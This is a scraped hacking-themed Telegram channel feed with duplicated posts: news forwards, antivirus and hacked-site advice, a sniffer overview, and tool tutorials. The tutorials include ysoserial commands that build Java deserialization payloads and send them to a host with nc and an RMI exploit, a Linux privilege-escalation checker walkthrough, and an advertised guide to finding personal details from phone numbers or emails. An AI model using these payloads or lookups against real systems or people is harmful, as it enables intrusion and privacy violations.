Forwarded from UNDERCODE NEWS
campus tv hackedο½The school campus TV station issued a statement saying that the youtube account was hacked
#cyberAttacks
#cyberAttacks
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Steps to crack BAT batch source code in pseudo EXE:
1) First of all, double-click the program to run, do not close, some programs will KillSelf when they are closed;
2) Secondly, cd %temp% under CMD. At the beginning, I used dir *.bat and did not find it. At this time, you have to think that it may be a .cmd file, so you can try dir *.cmd, but there is no result;
3) γγFinally, copy the found BAT and right-click "Edit" to see the source code. The source code is as follows:
@echo off
title [One-key clearing of print tasks] BY: wnsdt
color 2f
echo.&echo.&echo.
echo Description (2011.10.11):
echo.&echo.
echo This tool can quickly clear unresponsive printing tasks and solve problems that cannot be printed problem!
echo.
echo If you connect to a printer shared on the network, please run this tool on that computer!
echo.&echo.
echo --------------------------------------------- -------------------
echo.
Echo leave a message on Weibo if there is a problem <a href="http://t.qq.com/wnsdt_kk">http:// t.qq.com/wnsdt_kk</a>
echo.&echo.&echo.&echo.&echo.&echo.
echo Press any key to start, exit, please close
pause>nul 2>nul
cls
echo.&echo.&echo.&echo.&echo. &echo.
echo will be cleaned up later, please print again...
net stop spooler>nul 2>nul
del %systemroot%\System32\spool\PRINTERS\*.* /q /s /f>nul 2>nul
sc config spooler start= auto>nul 2>nul
net start spooler>nul 2 >nul
exit
Written @UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Steps to crack BAT batch source code in pseudo EXE:
1) First of all, double-click the program to run, do not close, some programs will KillSelf when they are closed;
2) Secondly, cd %temp% under CMD. At the beginning, I used dir *.bat and did not find it. At this time, you have to think that it may be a .cmd file, so you can try dir *.cmd, but there is no result;
3) γγFinally, copy the found BAT and right-click "Edit" to see the source code. The source code is as follows:
@echo off
title [One-key clearing of print tasks] BY: wnsdt
color 2f
echo.&echo.&echo.
echo Description (2011.10.11):
echo.&echo.
echo This tool can quickly clear unresponsive printing tasks and solve problems that cannot be printed problem!
echo.
echo If you connect to a printer shared on the network, please run this tool on that computer!
echo.&echo.
echo --------------------------------------------- -------------------
echo.
Echo leave a message on Weibo if there is a problem <a href="http://t.qq.com/wnsdt_kk">http:// t.qq.com/wnsdt_kk</a>
echo.&echo.&echo.&echo.&echo.&echo.
echo Press any key to start, exit, please close
pause>nul 2>nul
cls
echo.&echo.&echo.&echo.&echo. &echo.
echo will be cleaned up later, please print again...
net stop spooler>nul 2>nul
del %systemroot%\System32\spool\PRINTERS\*.* /q /s /f>nul 2>nul
sc config spooler start= auto>nul 2>nul
net start spooler>nul 2 >nul
exit
Written @UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#fastTips full webHacking via windows :
The OWASP Zed Attack Proxy (ZAP) is one of the worldβs most popular free security tools and is actively maintained by a dedicated international team of volunteers. It can help you automatically find security vulnerabilities in your web applications while you are developing and testing your applications. It's also a great tool for experienced pentesters to use for manual security testing.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½:
1) download https://www.zaproxy.org/download/
2) run the setup
3) use for learn
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#fastTips full webHacking via windows :
The OWASP Zed Attack Proxy (ZAP) is one of the worldβs most popular free security tools and is actively maintained by a dedicated international team of volunteers. It can help you automatically find security vulnerabilities in your web applications while you are developing and testing your applications. It's also a great tool for experienced pentesters to use for manual security testing.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½:
1) download https://www.zaproxy.org/download/
2) run the setup
3) use for learn
β β β Uππ»βΊπ«Δπ¬πβ β β β
www.zaproxy.org
ZAP β Download
The worldβs most widely used web app scanner. Free and open source. ZAP is a community project actively maintained by a dedicated international team, and a GitHub Top 1000 project.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Eight basic principles to stay away from viruses:
1. Establish good security habits. For example: Do not open some emails and attachments of unknown origin, do not go to some unknown websites, do not execute software that is downloaded from the Internet without anti-virus treatment, etc. These necessary habits will make you The computer is more secure.
2. Turn off or delete unnecessary services in the system . By default, many operating systems will install some auxiliary services, such as FTP client, Telnet, and Web server. These services provide convenience for attackers, but are not of much use to users. If they are deleted, the possibility of being attacked can be greatly reduced.
3. Update security patches frequently. According to statistics, 80% of network viruses spread through system security vulnerabilities , such as Worm King, Shockwave, Sasser, etc., so we should regularly download the latest security patches from the Microsoft website to prevent Before it happens. γγ
4. Using complex passwords Many network viruses attack the system by guessing simple passwords. Therefore, using complex passwords will greatly improve the security of the computer.
5. Quickly isolate the infected computer. When your computer finds a virus or abnormality, you should disconnect it immediately to prevent the computer from being infected more or becoming a source of transmission and infecting other computers again.
6. Know some virus knowledge so that you can discover new viruses in time and take corresponding measures to protect your computer from virus damage at critical moments. If you can understand some registry knowledge, you can regularly check whether there are suspicious keys in the registry's self-starting items; if you understand some memory knowledge, you can often check whether there are suspicious programs in the memory.
7. It is best to install professional anti-virus software for comprehensive monitoring. With the increasing number of viruses today, using anti-virus software for anti-virus is an increasingly economical choice. However, after installing anti-virus software, users should frequently upgrade and change some The main monitoring is often opened (such as mail monitoring), memory monitoring, etc., and problems should be reported, so as to truly protect the security of the computer.
8. Users should also install personal firewall software to prevent hacking. Due to the development of the Internet, hacker attacks on usersβ computers are becoming more and more serious. Many network viruses use hackers to attack usersβ computers. Therefore, users should also install Personal firewall software, set the security level to medium or high, so as to effectively prevent hacker attacks on the network.
@undercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Eight basic principles to stay away from viruses:
1. Establish good security habits. For example: Do not open some emails and attachments of unknown origin, do not go to some unknown websites, do not execute software that is downloaded from the Internet without anti-virus treatment, etc. These necessary habits will make you The computer is more secure.
2. Turn off or delete unnecessary services in the system . By default, many operating systems will install some auxiliary services, such as FTP client, Telnet, and Web server. These services provide convenience for attackers, but are not of much use to users. If they are deleted, the possibility of being attacked can be greatly reduced.
3. Update security patches frequently. According to statistics, 80% of network viruses spread through system security vulnerabilities , such as Worm King, Shockwave, Sasser, etc., so we should regularly download the latest security patches from the Microsoft website to prevent Before it happens. γγ
4. Using complex passwords Many network viruses attack the system by guessing simple passwords. Therefore, using complex passwords will greatly improve the security of the computer.
5. Quickly isolate the infected computer. When your computer finds a virus or abnormality, you should disconnect it immediately to prevent the computer from being infected more or becoming a source of transmission and infecting other computers again.
6. Know some virus knowledge so that you can discover new viruses in time and take corresponding measures to protect your computer from virus damage at critical moments. If you can understand some registry knowledge, you can regularly check whether there are suspicious keys in the registry's self-starting items; if you understand some memory knowledge, you can often check whether there are suspicious programs in the memory.
7. It is best to install professional anti-virus software for comprehensive monitoring. With the increasing number of viruses today, using anti-virus software for anti-virus is an increasingly economical choice. However, after installing anti-virus software, users should frequently upgrade and change some The main monitoring is often opened (such as mail monitoring), memory monitoring, etc., and problems should be reported, so as to truly protect the security of the computer.
8. Users should also install personal firewall software to prevent hacking. Due to the development of the Internet, hacker attacks on usersβ computers are becoming more and more serious. Many network viruses use hackers to attack usersβ computers. Therefore, users should also install Personal firewall software, set the security level to medium or high, so as to effectively prevent hacker attacks on the network.
@undercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Usually the content that sniffer cares about can be divided into the following categories:
1. Password
I think this is the reason for the vast majority of illegal use of sniffer, sniffer can record the userid and passwd transmitted in plain text. Even if you use encryption during network transmission Data, like the data recorded by sniffer, may make the intruder try to figure out your algorithm while eating skewers at home.
2. Financial account
Many users are at ease using their credit card or cash account on the Internet, but sniffers can easily intercept the user name, password, credit card number, expiration date, account number, and pin sent online.
3. Peeping confidential or sensitive information and data
through interception Data packets, intruders can easily record the transfer of sensitive information between others, or simply intercept the entire email conversation process.
4. Spy on low-level protocol information.
This is a terrible thing, I think, by recording the underlying information protocol, such as recording the network interface address between two hosts, the remote network interface ip address, ip routing information, and the byte order number of the tcp connection.
> This information will pose a great harm to network security after being held by an illegal intruder. Usually someone uses sniffers to collect this information for only one reason: he is conducting a fraud, (usually ip address fraud requires you to accurately insert the tcp connection Byte order number, which will be pointed out in a future article) If someone is very concerned about this issue, then the sniffer is just a prelude to him, and the future problems will be much bigger.
@undercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Usually the content that sniffer cares about can be divided into the following categories:
1. Password
I think this is the reason for the vast majority of illegal use of sniffer, sniffer can record the userid and passwd transmitted in plain text. Even if you use encryption during network transmission Data, like the data recorded by sniffer, may make the intruder try to figure out your algorithm while eating skewers at home.
2. Financial account
Many users are at ease using their credit card or cash account on the Internet, but sniffers can easily intercept the user name, password, credit card number, expiration date, account number, and pin sent online.
3. Peeping confidential or sensitive information and data
through interception Data packets, intruders can easily record the transfer of sensitive information between others, or simply intercept the entire email conversation process.
4. Spy on low-level protocol information.
This is a terrible thing, I think, by recording the underlying information protocol, such as recording the network interface address between two hosts, the remote network interface ip address, ip routing information, and the byte order number of the tcp connection.
> This information will pose a great harm to network security after being held by an illegal intruder. Usually someone uses sniffers to collect this information for only one reason: he is conducting a fraud, (usually ip address fraud requires you to accurately insert the tcp connection Byte order number, which will be pointed out in a future article) If someone is very concerned about this issue, then the sniffer is just a prelude to him, and the future problems will be much bigger.
@undercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
5 h vote, Suggest us / you want in next posts :
Anonymous Poll
35%
More exploits guides ?
13%
More related to sniffing attacks ?
16%
Updates for termux/linux tools ?
19%
Some tips for beginers ?
17%
Others(courses/pdfs..)
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦LES: Linux privilege escalation auditing tool:
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1)DOWNLOAD :
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
> Details about LES usage and inner workings:
https://mzet-.github.io/2019/05/10/les-paper.html
Additional resources for the LES:
https://github.com/mzet-/les-res
2) cd dir
3) $ ./linux-exploit-suggester.sh
4) For each exploit, exposure is calculated. Following 'Exposure' states are possible:
1οΈβ£Highly probable - assessed kernel is most probably affected and there's a very good chance that PoC exploit will work out of the box without any major modifications.
2οΈβ£Probable - it's possible that exploit will work but most likely customization of PoC exploit will be needed to suit your target.
3οΈβ£Less probable - additional manual analysis is needed to verify if kernel is affected.
4οΈβ£Unprobable - highly unlikely that kernel is affected (exploit is not displayed in the tool's output)
5) Verifying state of kernel hardening security measures
LES can check for most of security settings available by your Linux kernel. It verifies not only the kernel compile-time configurations (CONFIGs) but also verifies run-time settings (sysctl) giving more complete picture of security posture for running kernel. This functionality is modern continuation of --kernel switch from checksec.sh tool by Tobias Klein. Example of tool output:
$ ./linux-exploit-suggester.sh --checksec
6) Assess exposure of the Linux box on publicly known exploits:
$ ./linux-exploit-suggester.sh
Show state of security features on the Linux box:
$ ./linux-exploit-suggester.sh --checksec
Assess exposure of Linux kernel on publicly known exploits based on the provided 'uname' string (i.e. output of uname -a command):
$ ./linux-exploit-suggester.sh --uname <uname-string>
USE FOR LEARN !!!
verified @UndercodeTesting
β git topic
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦LES: Linux privilege escalation auditing tool:
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1)DOWNLOAD :
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
> Details about LES usage and inner workings:
https://mzet-.github.io/2019/05/10/les-paper.html
Additional resources for the LES:
https://github.com/mzet-/les-res
2) cd dir
3) $ ./linux-exploit-suggester.sh
4) For each exploit, exposure is calculated. Following 'Exposure' states are possible:
1οΈβ£Highly probable - assessed kernel is most probably affected and there's a very good chance that PoC exploit will work out of the box without any major modifications.
2οΈβ£Probable - it's possible that exploit will work but most likely customization of PoC exploit will be needed to suit your target.
3οΈβ£Less probable - additional manual analysis is needed to verify if kernel is affected.
4οΈβ£Unprobable - highly unlikely that kernel is affected (exploit is not displayed in the tool's output)
5) Verifying state of kernel hardening security measures
LES can check for most of security settings available by your Linux kernel. It verifies not only the kernel compile-time configurations (CONFIGs) but also verifies run-time settings (sysctl) giving more complete picture of security posture for running kernel. This functionality is modern continuation of --kernel switch from checksec.sh tool by Tobias Klein. Example of tool output:
$ ./linux-exploit-suggester.sh --checksec
6) Assess exposure of the Linux box on publicly known exploits:
$ ./linux-exploit-suggester.sh
Show state of security features on the Linux box:
$ ./linux-exploit-suggester.sh --checksec
Assess exposure of Linux kernel on publicly known exploits based on the provided 'uname' string (i.e. output of uname -a command):
$ ./linux-exploit-suggester.sh --uname <uname-string>
USE FOR LEARN !!!
verified @UndercodeTesting
β git topic
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - mzet-/les-res: Additional resources and references for linux-exploit-suggester.sh
Additional resources and references for linux-exploit-suggester.sh - mzet-/les-res
Find_Details_Of_any_Mobile_Number,_Email_ID,_IP_Address_in_the_world.pdf
2.5 MB
Find Details Of any Mobile Number, Email ID, IP Address in the world (Step By Step) #Highrequested
Forwarded from UNDERCODE NEWS
The world's largest ATM makers, Diebold Nixdorf and NCR, have released software updates for their devices.
#Vulnerabilities
#Vulnerabilities
Forwarded from UNDERCODE NEWS
University of Utah officials said the university has recently been compelled to pay hackers $457,059 to avoid leaking of student records #Leaks
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#EXPLOITATION :
> ysoserial is a collection of utilities and property-oriented programming "gadget chains" discovered in common java libraries that can, under the right conditions, exploit Java applications performing unsafe deserialization of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) downloadf https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
2) $ java -jar ysoserial.jar
3) Y SO SERIAL?
Usage: java -jar ysoserial.jar [payload] '[command]'
4) $ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd
0000000: aced 0005 7372 0032 7375 6e2e 7265 666c ....sr.2sun.refl
0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A
0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat
...
0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76 vr..java.lang.Ov
0000560: 6572 7269 6465 0000 0000 0000 0000 0000 erride..........
0000570: 0078 7071 007e 003a .xpq.~.:
5) $ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
6) $ nc 10.10.10.10 1099 < groovypayload.bin
7) $ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
π¦R E Q U I R E M E N T S :
Requires Java 1.7+ and Maven 3.x+
mvn clean package -DskipTests
VERIFIED @undercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#EXPLOITATION :
> ysoserial is a collection of utilities and property-oriented programming "gadget chains" discovered in common java libraries that can, under the right conditions, exploit Java applications performing unsafe deserialization of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) downloadf https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
2) $ java -jar ysoserial.jar
3) Y SO SERIAL?
Usage: java -jar ysoserial.jar [payload] '[command]'
4) $ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd
0000000: aced 0005 7372 0032 7375 6e2e 7265 666c ....sr.2sun.refl
0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A
0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat
...
0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76 vr..java.lang.Ov
0000560: 6572 7269 6465 0000 0000 0000 0000 0000 erride..........
0000570: 0078 7071 007e 003a .xpq.~.:
5) $ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
6) $ nc 10.10.10.10 1099 < groovypayload.bin
7) $ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
π¦R E Q U I R E M E N T S :
Requires Java 1.7+ and Maven 3.x+
mvn clean package -DskipTests
VERIFIED @undercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What should I do if the website is hacked and injected into the blog color page
Whenever there are competitions such as the European Cup, the World Cup, and the Olympic Games, various gaming groups resort to their best efforts to hack normal websites, especially high-traffic information websites. Through internal testing, Baidu found that the number of sites hacked during the European Cup is on the rise. Baidu has increased the efficiency and intensity of punishment. So, how can we avoid being hacked as a site?
[Self-check whether it has been hacked]
1. The hacked website has a feature in the data, that is, the amount of index and the traffic brought from search engines have increased dramatically in a short period of time . Therefore, the webmaster can benefit from the index volume tool of the Baidu webmaster platform to observe whether there is an abnormality in the siteβs inclusion volume; if a sudden increase is found, use the traffic and keyword tool to check whether the keywords obtained are related to the website, whether it involves gambling and pornography .
2. Query the site through Site grammar, and combine some common pornographic and gambling keywords to achieve better results. It is possible to find illegal pages that do not belong to the site.
3. Due to the huge traffic of Baidu, some hacked behaviors only redirect the traffic brought by Baidu, which is difficult for the webmaster to find. Therefore, when checking whether your site is hacked, you must click on the site page from the Baidu search results to view Did you jump to other sites?
4. The content of the site is shown as risky in the search results.
*Subsequently, you can ask website technicians to further confirm whether the website is hacked through background data and programs
[How to deal with after being hacked]
After confirming that the website is hacked, in addition to prompting technical staff to make quick corrections, SEO staff also need to do some after-care and preventive work.
1. Immediately stop the website service to prevent users from continuing to be affected and prevent other sites from continuing to be affected (recommended to use the 503 return code).
2. If multiple sites of the same hosting provider are hacked during the same period, you can contact the hosting provider to urge the other party to respond.
3. Clean up the discovered hacked content, set the hacked page as a 404 dead link, and submit it through the dead link submission tool of the Baidu webmaster platform.
4. Check out the possible hacking time, compare it with the file modification time on the server, and deal with the files uploaded and modified by hackers; check the user management settings in the server to confirm whether there are abnormal changes; change the user of the server Access password. Note: The possible hacking time can be determined from the access log. However, the hacker may also modify the server's access log.
5. Do a good job in security, check the loopholes in the website, and prevent it from being hacked again.
The above is the processing method of the website being hacked into the blog color page.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What should I do if the website is hacked and injected into the blog color page
Whenever there are competitions such as the European Cup, the World Cup, and the Olympic Games, various gaming groups resort to their best efforts to hack normal websites, especially high-traffic information websites. Through internal testing, Baidu found that the number of sites hacked during the European Cup is on the rise. Baidu has increased the efficiency and intensity of punishment. So, how can we avoid being hacked as a site?
[Self-check whether it has been hacked]
1. The hacked website has a feature in the data, that is, the amount of index and the traffic brought from search engines have increased dramatically in a short period of time . Therefore, the webmaster can benefit from the index volume tool of the Baidu webmaster platform to observe whether there is an abnormality in the siteβs inclusion volume; if a sudden increase is found, use the traffic and keyword tool to check whether the keywords obtained are related to the website, whether it involves gambling and pornography .
2. Query the site through Site grammar, and combine some common pornographic and gambling keywords to achieve better results. It is possible to find illegal pages that do not belong to the site.
3. Due to the huge traffic of Baidu, some hacked behaviors only redirect the traffic brought by Baidu, which is difficult for the webmaster to find. Therefore, when checking whether your site is hacked, you must click on the site page from the Baidu search results to view Did you jump to other sites?
4. The content of the site is shown as risky in the search results.
*Subsequently, you can ask website technicians to further confirm whether the website is hacked through background data and programs
[How to deal with after being hacked]
After confirming that the website is hacked, in addition to prompting technical staff to make quick corrections, SEO staff also need to do some after-care and preventive work.
1. Immediately stop the website service to prevent users from continuing to be affected and prevent other sites from continuing to be affected (recommended to use the 503 return code).
2. If multiple sites of the same hosting provider are hacked during the same period, you can contact the hosting provider to urge the other party to respond.
3. Clean up the discovered hacked content, set the hacked page as a 404 dead link, and submit it through the dead link submission tool of the Baidu webmaster platform.
4. Check out the possible hacking time, compare it with the file modification time on the server, and deal with the files uploaded and modified by hackers; check the user management settings in the server to confirm whether there are abnormal changes; change the user of the server Access password. Note: The possible hacking time can be determined from the access log. However, the hacker may also modify the server's access log.
5. Do a good job in security, check the loopholes in the website, and prevent it from being hacked again.
The above is the processing method of the website being hacked into the blog color page.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β